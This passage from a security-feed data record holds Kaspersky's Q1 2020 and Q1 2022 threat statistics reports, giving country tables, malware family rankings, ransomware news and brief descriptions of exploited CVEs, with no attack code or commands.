country._\n\nThe leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%. \n \nSSH | 18.9% \nTelnet | 81.1% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020_\n\nIt was a similar situation with control sessions: attackers often controlled infected traps via telnet. \n \nSSH | 39.62% \nTelnet | 60.38% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020_\n\n### Telnet-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194811/sl_malware_report_09-en-telnet-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps.**\n\nCountry* | **%** \n---|--- \nChina | 13.04 \nEgypt | 11.65 \nBrazil | 11.33 \nVietnam | 7.38 \nTaiwan | 6.18 \nRussia | 4.38 \nIran | 3.96 \nIndia | 3.14 \nTurkey | 3.00 \nUSA | 2.57 \n \n_ _ \nFor several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).\n\n### SSH-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194853/sl_malware_report_10-en-ssh-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps.**\n\nCountry* | % \n---|--- \nChina | 14.87 \nVietnam | 11.58 \nUSA | 7.03 \nEgypt | 6.82 \nBrazil | 5.79 \nRussia | 4.66 \nIndia | 4.16 \nGermany | 3.64 \nThailand | 3.44 \nFrance | 2.83 \n \nIn Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.\n\n### Threats loaded into honeypots\n\n**Verdict** | %* \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 64.35 \nBackdoor.Linux.Mirai.b | 16.75 \nBackdoor.Linux.Mirai.ba | 6.47 \nBackdoor.Linux.Gafgyt.a | 4.36 \nBackdoor.Linux.Gafgyt.bj | 1.30 \nTrojan-Downloader.Shell.Agent.p | 0.68 \nBackdoor.Linux.Mirai.c | 0.64 \nBackdoor.Linux.Hajime.b | 0.46 \nBackdoor.Linux.Mirai.h | 0.40 \nBackdoor.Linux.Gafgyt.av | 0.35 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nIn Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.\n\n_Number of unique users attacked by financial malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194937/sl_malware_report_11-en-finance.png>)_\n\n**Attack geography**\n\nTo assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195018/sl_malware_report_12-en-finance-map.png>)_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Uzbekistan | 10.5 \n2 | Tajikistan | 6.9 \n3 | Turkmenistan | 5.5 \n4 | Afghanistan | 5.1 \n5 | Yemen | 3.1 \n6 | Kazakhstan | 3.0 \n7 | Guatemala | 2.8 \n8 | Syria | 2.4 \n9 | Sudan | 2.1 \n10 | Kyrgyzstan | 2.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Emotet | Backdoor.Win32.Emotet | 21.3 | \n2 | Zbot | Trojan.Win32.Zbot | 20.8 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 17.2 | \n4 | RTM | Trojan-Banker.Win32.RTM | 12.3 | \n5 | Nimnul | Virus.Win32.Nimnul | 3.6 | \n6 | Trickster | Trojan.Win32.Trickster | 3.6 | \n7 | Neurevt | Trojan.Win32.Neurevt | 3.3 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.0 | \n10 | Nymaim | Trojan.Win32.Nymaim | 1.9 | \n \n_** Unique users attacked by this malware family as a __percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly highlights\n\nRansomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.\n\nMore and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.\n\n### Number of new modifications\n\nIn Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.\n\n_Number of new ransomware modifications detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195150/sl_malware_report_13-ransomware-novye-modifikacii.png>)_\n\n### Number of users attacked by ransomware trojans\n\nIn Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195235/sl_malware_report_14-en-ransomware-atakovannye-polzovateli.png>)_\n\n### Attack geography\n\n \n\n_Geography of attacks by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201512/sl_malware_report_15-en-ransomware-map.png>)_\n\n**Top 10 countries attacked by ransomware trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 6.64 \n2 | Uzbekistan | 1.98 \n3 | Mozambique | 1.77 \n4 | Ethiopia | 1.67 \n5 | Nepal | 1.34 \n6 | Afghanistan | 1.31 \n7 | Egypt | 1.21 \n8 | Ghana | 0.83 \n9 | Azerbaijan | 0.81 \n10 | Serbia | 0.74 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.03 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 16.71 | \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 16.22 | \n4 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 7.73 | \n5 | Stop | Trojan-Ransom.Win32.Stop | 6.62 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.28 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.15 | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom,\n\nTrojan-Ransom.Win32.PolyRansom | 2.96 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.02 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Generic | 1.56 | \n| | | | | \n \n_* Unique Kaspersky users __attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.\n\n_Number of new miner modifications, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201558/sl_malware_report_16-en-miner-kolichestvo-novyh-modifikacij.png>)_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201637/sl_malware_report_17-en-miner-kolichestvo-polzovatelej-atakovannyh-majnerami.png>)_\n\n### Attack geography\n\n \n\n_Geography of miner attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201719/sl_malware_report_18-en-miner-map.png>)_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 6.72 \n2 | Ethiopia | 4.90 \n3 | Tanzania | 3.26 \n4 | Sri Lanka | 3.22 \n5 | Uzbekistan | 3.10 \n6 | Rwanda | 2.56 \n7 | Vietnam | 2.54 \n8 | Kazakhstan | 2.45 \n9 | Mozambique | 1.96 \n10 | Pakistan | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nWe already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which is related to a stack overflow error in the Equation Editor component. Hard on its heels was [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user's system becomes infected.\n\nIn second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome, and Mozilla Firefox. What's more, some of the vulnerabilities were used in APT attacks, such as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. Another example is the previously identified [CVE-2019-17026](<https://nvd.nist.gov/vuln/detail/CVE-2019-17026>), a data type mismatch vulnerability in Mozilla Firefox's JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability [CVE-2020-6418](<https://nvd.nist.gov/vuln/detail/CVE-2020-6418>) in the JavaScript engine; in addition, the dangerous RCE vulnerability [CVE-2020-0767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767>) was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201812/sl_malware_report_19-vuln.png>)_\n\nThis quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.\n\n * [CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a vulnerability that exploits an error in the core cryptographic library of Windows, in a certificate validation algorithm that uses elliptic curves. This vulnerability enables the use of fake certificates that the system recognizes as legitimate.\n * [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>) is a vulnerability in processing LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.\n * [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.\n\nVarious network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost) was detected in the SMBv3 network protocol, leading to remote code execution, in which regard the attacker does not even need to know the username/password combination (since the error occurs before the authentication stage); however, it is present only in Windows 10. In Remote Desktop Gateway there were found two critical vulnerabilities ([CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>)) enabling an unauthorized user to execute remote code in the target system. In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol as well.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202037/sl_malware_report_20-en-web-source.png>)_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware class_**_;_ it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Bulgaria | 13.89 \n2 | Tunisia | 13.63 \n3 | Algeria | 13.15 \n4 | Libya | 12.05 \n5 | Bangladesh | 9.79 \n6 | Greece | 9.66 \n7 | Latvia | 9.64 \n8 | Somalia | 9.20 \n9 | Philippines | 9.11 \n10 | Morocco | 9.10 \n11 | Albania | 9.09 \n12 | Taiwan, Province of China | 9.04 \n13 | Mongolia | 9.02 \n14 | Nepal | 8.69 \n15 | Indonesia | 8.62 \n16 | Egypt | 8.61 \n17 | Georgia | 8.47 \n18 | France | 8.44 \n19 | Palestine | 8.34 \n20 | Qatar | 8.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data._\n\nOn average, 6.56% of Internet user' computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202126/sl_malware_report_21-en-web-map.png>)_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2020, our File Anti-Virus registered **164,653,290** malicious and potentially unwanted objects.** **\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 52.20 \n2 | Tajikistan | 47.14 \n3 | Uzbekistan | 45.16 \n4 | Ethiopia | 45.06 \n5 | Myanmar | 43.14 \n6 | Bangladesh | 42.14 \n7 | Kyrgyzstan | 41.52 \n8 | Yemen | 40.88 \n9 | China | 40.67 \n10 | Benin | 40.21 \n11 | Mongolia | 39.58 \n12 | Algeria | 39.55 \n13 | Laos | 39.21 \n14 | Burkina Faso | 39.09 \n15 | Malawi | 38.42 \n16 | Sudan | 38.34 \n17 | Rwanda | 37.84 \n18 | Iraq | 37.82 \n19 | Vietnam | 37.42 \n20 | Mauritania | 37.26 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers _**_Malware-class_**_ local threats were blocked as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202208/sl_malware_report_22-en-local-map.png>)_\n\nOverall, 19.16% of user computers globally faced at least one **Malware**-class local threat during Q1.", "cvss3": {}, "published": "2020-05-20T10:00:43", "type": "securelist", "title": "IT threat evolution Q1 2020. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-17026", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0729", "CVE-2020-0767", "CVE-2020-0796", "CVE-2020-6418"], "modified": "2020-05-20T10:00:43", "id": "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "href": "https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T13:56:48", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/26105037/sl-insect-threat-malware-bug-ant-990x400.jpg)\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: "more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money."\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim's encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government's actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter 